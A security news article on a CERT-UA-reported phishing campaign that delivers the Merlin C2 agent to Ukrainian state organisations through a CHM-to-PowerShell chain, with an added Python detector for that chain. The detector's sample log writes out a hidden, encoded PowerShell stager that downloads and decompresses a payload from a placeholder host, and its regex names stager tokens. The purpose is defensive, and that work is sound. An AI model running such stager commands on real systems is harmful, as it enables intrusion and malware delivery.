
Hackers use open-source Merlin post-exploitation toolkit in attacks


Ukraine is warning of a wave of attacks targeting state organizations using 'Merlin,' an open-source post-exploitation and command and control (C2) framework.

Merlin is a Go-based, cross-platform post-exploitation toolkit available for free on GitHub, with extensive documentation aimed at security professionals running red team exercises.

It offers a wide range of features that let red teamers (and attackers) establish and keep a foothold on a compromised network:

  • Support for HTTP/1.1 over TLS and HTTP/3 (HTTP over QUIC) for C2 communication.
  • PBES2 (RFC 2898) and AES Key Wrap (RFC 3394) for agent traffic encryption.
  • OPAQUE Asymmetric Password Authenticated Key Exchange (PAKE) and encrypted JWT for secure user authentication.
  • Support for CreateThread, CreateRemoteThread, RtlCreateUserThread, and QueueUserAPC shellcode execution techniques.
  • Domain fronting for bypassing network filtering.
  • Integrated Donut, sRDI, and SharpGen support.
  • Dynamic changes to the agent's JA3 hash and C2 traffic message padding for evading detection.

However, as previously seen with Sliver, Merlin is now being abused by threat actors, who use it to power their own attacks and spread laterally through compromised networks.

CERT-UA reports that it detected the framework in attacks that began with a phishing email impersonating the agency (sender address: cert-ua@ukr.net) that purportedly provided recipients with instructions on hardening their MS Office suite.

Sample of the malicious email (Source: CERT-UA)

The emails carry a CHM file attachment that, if opened, executes JavaScript code which in turn runs a PowerShell script that fetches, decrypts, and decompresses a GZIP archive containing the executable "ctlhost.exe." CHM (Compiled HTML Help) files are rendered by the Windows HTML Help viewer, and script embedded in them runs with the opening user's privileges, which is why a help-file attachment can chain straight into PowerShell.

If the recipient runs this executable, their computer is infected with the Merlin agent, giving the threat actors access to the machine and its data, and a foothold from which to move laterally across the network.

Executable that loads the Merlin agent on the system (Source: CERT-UA)
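The chain described above (CHM attachment, embedded script, PowerShell stager, dropped ctlhost.exe) is what a defender can hunt for in process-creation telemetry. The following is an added example written for this article, not CERT-UA's or Merlin's code. It assumes Sysmon-style process-creation events exported as one JSON object per line with pid, ppid, image and cmdline fields; the sample log is constructed, and the hh.exe parent, the script-host list and the command-line tokens are heuristic assumptions, not indicators taken from the report.

```python
"""Detection sketch for the CHM -> script -> PowerShell -> dropped-EXE chain.

Added example (not CERT-UA's or Merlin's code). Consumes Sysmon-style
process-creation events, one JSON object per line, with the fields
pid, ppid, image and cmdline. The log below is constructed.
"""
import json
import re

# Windows HTML Help viewer: the default handler for .chm attachments.
HELP_VIEWER = "hh.exe"
# Script hosts a CHM's embedded script commonly reaches for (assumed list).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Heuristic download/decode/decompress tokens; the real script's text is not
# in the report, so these are assumptions about what a stager tends to contain.
STAGER_HINTS = re.compile(
    r"downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b|"
    r"frombase64string|gzipstream|decompress|-enc\b|-encodedcommand",
    re.IGNORECASE,
)
# Directories an unprivileged user can write to and launch binaries from.
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public|programdata)\\",
                           re.IGNORECASE)

# Constructed sample log mirroring the chain in the report, plus two benign events.
SAMPLE_LOG = r"""
{"pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"}
{"pid": 200, "ppid": 100, "image": "C:\\Windows\\hh.exe", "cmdline": "\"C:\\Windows\\hh.exe\" C:\\Users\\u\\Downloads\\office-hardening.chm"}
{"pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c powershell -w hidden -enc AAAA"}
{"pid": 400, "ppid": 300, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -w hidden -c $b=(New-Object Net.WebClient).DownloadData('http://example.invalid/p.gz');$g=New-Object IO.Compression.GZipStream($m,[IO.Compression.CompressionMode]::Decompress)"}
{"pid": 500, "ppid": 400, "image": "C:\\Users\\u\\AppData\\Local\\Temp\\ctlhost.exe", "cmdline": "ctlhost.exe"}
{"pid": 600, "ppid": 100, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "cmdline": "WINWORD.EXE"}
{"pid": 700, "ppid": 100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -c Get-Process"}
"""


def parse_events(text):
    """Parse one JSON event per line into a pid -> event map; blank lines skipped."""
    events = {}
    for line in text.splitlines():
        line = line.strip()
        if line:
            event = json.loads(line)
            events[event["pid"]] = event
    return events


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(events, pid):
    """Yield ancestor events from the parent upwards, guarding against pid cycles."""
    seen = set()
    ppid = events[pid].get("ppid")
    while ppid in events and ppid not in seen:
        seen.add(ppid)
        yield events[ppid]
        ppid = events[ppid].get("ppid")


def detect(text):
    """Return {pid: [reasons]} for events matching a stage of the chain."""
    events = parse_events(text)
    findings = {}

    def flag(pid, reason):
        findings.setdefault(pid, []).append(reason)

    for pid, event in events.items():
        name = basename(event["image"])
        parent = events.get(event.get("ppid"))
        parent_name = basename(parent["image"]) if parent else ""
        # Stage 1: the help viewer (opened CHM) spawning a script host.
        if parent_name == HELP_VIEWER and name in SCRIPT_HOSTS:
            flag(pid, "script host spawned by HTML Help viewer")
        # Stage 2: PowerShell whose command line carries stager indicators.
        if name in POWERSHELL and STAGER_HINTS.search(event.get("cmdline", "")):
            flag(pid, "PowerShell stager indicators in command line")

    for pid, event in events.items():
        name = basename(event["image"])
        # Stage 3: a binary run from a user-writable path whose ancestry includes
        # the help viewer or a process already flagged above (the dropped EXE).
        if name not in SCRIPT_HOSTS and USER_WRITABLE.search(event["image"]):
            for ancestor in ancestors(events, pid):
                if basename(ancestor["image"]) == HELP_VIEWER or ancestor["pid"] in findings:
                    flag(pid, "executable dropped to user-writable path by suspicious chain")
                    break
    return findings


if __name__ == "__main__":
    for pid, reasons in sorted(detect(SAMPLE_LOG).items()):
        print(pid, "; ".join(reasons))
```

Run stand-alone, the script flags pids 300, 400 and 500 (the cmd.exe child of hh.exe, the PowerShell stager and the dropped ctlhost.exe) and leaves the benign Word and Get-Process events alone. Stage 3 deliberately keys on ancestry rather than on the file name ctlhost.exe, since a renamed dropper would otherwise slip through; in production the path and token lists would be tuned to the environment's own baseline.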

CERT-UA tracks this malicious activity under the identifier UAC-0154; the first attacks were recorded on July 10, 2023, when the threat actors used a "UAV training" lure in their emails.

Using open-source tools like Merlin against government agencies or other critical organizations also makes attribution harder: the tooling is shared by many operators, so it leaves fewer distinct traces that can be tied to a specific threat actor.
